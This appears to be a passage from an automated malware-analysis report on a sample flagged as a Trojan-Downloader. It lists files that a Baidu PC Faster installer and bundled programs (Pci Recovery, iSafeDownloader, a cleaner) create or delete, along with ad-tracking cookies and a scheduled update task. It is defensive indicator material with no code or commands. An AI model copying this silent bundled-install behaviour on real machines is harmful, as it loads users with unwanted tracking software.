%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\6.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\LinkCensor.dat (104 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1169.LoadTubes.rul (812 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\common\common.bskin (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log2.dll (12088 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BBK_on.png (506 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BEVMEngine.dll (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Philips_on.png (449 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\WebClient.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11351.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\BrowserDefender.rul.bak (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\data.bns (514 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\uTorrentControl.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10129.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1051.SavingsApp.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\85Play_Games.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1158.UnfriendCheck.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\ResultRecommend\config.txt (23 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\sysconfig.ini (473 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Google_on.png (691 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\webcake.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Xiaomi_off.png (385 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\PluginOptimizer\img_circle.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\LogReporter.exe (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\BHips.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\snow.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\searchya.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1144.WiseConvertB2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\connect_circle.png (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1086.DownloadEnergyToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0006.UpdateChecker.rul (671 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0008.UnderTheSea.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0011.CdCoverCreator.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1139.RecipesBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1128.EasyTVBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\ieprotect\ieprotect.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1053.SupremeSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\15.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1189.JollyWallet.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10092.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0024.VideoDownloadConvert.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\update\update.bskin (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsHB.dll (16288 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\lang.ini (162 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1183.SuperfishWindowShopper.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BdApiUtil.dll (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10495.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1175.SySaver.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1077.BrowserCompanion.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Samsung_off.png (597 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1134.ooVoo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1142.KeyBar1.13.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1046.appbario12.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1050.SolidSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\lightning.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\5.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Motorola_off.png (541 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1051.SavingsApp.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PopupTip.exe (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1064.Webblog.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Aflamster.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\SearchAmong.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\CouponCompanion.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1060.LuckySavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe (39329 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1125.NCH_ENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1162.TidyNetwork.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\hipspop\hipspop.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1196.V9Toolbar.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0004.iLivid.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1161.Linksicle.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1136.AF_HSS.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1067.SearchAssistant.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1146.BrotherSoftExtremeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\cloudy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1183.SuperfishWindowShopper.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\TCL_off.png (454 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1050.SolidSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0022.AnimatorDV.rul (352 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DeepOptimization.exe (60186 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_crashreporter\skin_crashreporter.bskin (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\sbr2.dat (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1132.SerifBar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\IEProtect.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1138.MapsBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\ieprotect_font\ieprotect_font.bskin (488 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\oovoo.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\BugReporter\BugReporter.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1185.InstantSavingsApp.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPC_on.png (380 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Xiaomi_on.png (399 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\littleboy.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1074.CodecPerformer.rul (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sysconfig.ini (473 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1110.BrowseForTheCause.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\common\common.bskin (367 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0018.AbsoluteShieldfileshredder.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Dealio.rul.bak (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1169.LoadTubes.rul (812 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1179.FilesFrogUpdateChecker.rul (765 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10684.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Inbox.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\HTC_off.png (481 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1113.SpyGuard.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\NewFeatures\NewFeatures.bskin (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallUtility.dll (35001 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\hipspop\hipspop.bskin (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Feedback.lnk (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1150.DealSlider.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1076.SavingsAddon.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10021.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1197.Desk365.rul (3 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\DataReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\LogReporter.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\config.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallUtility.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallCheck.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\string.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\snetcfg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\NewFeatures.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sysconfig.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\BHips.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sqlite.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\url.ini (0 bytes)
The process PC_Faster_Setup_Mini_B104_144327560.exe:1284 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\546bc63d69dc67b163bfc222c0f38be6.gnet.tmp (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniService.exe (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\config.xml_.tmp (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].tmp (1034 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].tmp (1395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniServicePlugIn.dll (1608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81e529e3201a4f47a9fb16e1d81dcc1e.gnet.tmp (3008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Baidu_Secure_SystemUp_5.0.4.87531.exe (138231 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].tmp (1704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pcfB6.tmp (21 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].tmp (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\urlB8.tmp (196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].tmp (770 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniService.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].dat (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].dat (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData\rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniServicePlugIn.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].dat (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\downinfo[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pcfB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\urlB8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService (0 bytes)
The process PCFTray.exe:2564 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (80 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SdkConfig.ini (16 bytes)
The process schtasks.exe:136 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%WinDir%\Tasks\Baidu PC Faster Update.job (412 bytes)
The process SysOptEngineSvc.exe:1724 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster (4 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (484 bytes)
C:\$Directory (484 bytes)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_80.dat (100 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0 (384 bytes)
%WinDir%\Temp\Perflib_Perfdata_428.dat (100 bytes)
%WinDir%\Temp\Perflib_Perfdata_7ac.dat (4 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswBF.tmp (47940 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
The process PopupTip.exe:2760 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[1].txt (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\p[1].xml (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\statistic[1].htm (435 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[2].txt (494 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (64 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[2].txt (0 bytes)
The process irsetup.exe:508 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Program Files%\Pci Recovery\Uninstall\uniB9.tmp (9317 bytes)
%Program Files%\Pci Recovery\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.pcfaster[1].txt (136 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@network.adsmarket[2].txt (500 bytes)
%Program Files%\Pci Recovery\Uninstall\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@network.adsmarket[1].txt (245 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[1].txt (6010 bytes)
%Program Files%\Pci Recovery\lua5.1.dll (2902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\PC_Faster_Setup_Mini_B104_144327560.exe (1065719 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[2].txt (7049 bytes)
%Program Files%\Pci Recovery\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[1].txt (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Pci Recovery Setup Log.txt (2260 bytes)
%Program Files%\Pci Recovery\Uninstall\IRIMG2.JPG (29 bytes)
%Program Files%\Pci Recovery\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (16388 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[2].txt (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yet_another_cleaner_mat.exe (381505 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IRWB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@network.adsmarket[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRWB4.tmp (0 bytes)
%Program Files%\Pci Recovery\Uninstall\uniB9.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRWB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRWB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRWB5.tmp (0 bytes)
The process iSafeDownloader.exe:1544 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~dlBD.tmp.bk (524749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~dlBD.tmp (3905701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yac[1].exe (3782807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Application Data\eCyber\log\isafedownloader.log (1004 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~dlBD.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~dlBD.tmp.bk (0 bytes)
The process yet_another_cleaner_mat.exe:1576 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_tip_icon.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_btn_bk.png (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_indeterminate.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\iSafeDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_clean_icon.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_skin.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\popup_bk.png (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\toggle_btn_pop_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_close_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\msgbox_bk_eu.png (13 bytes)
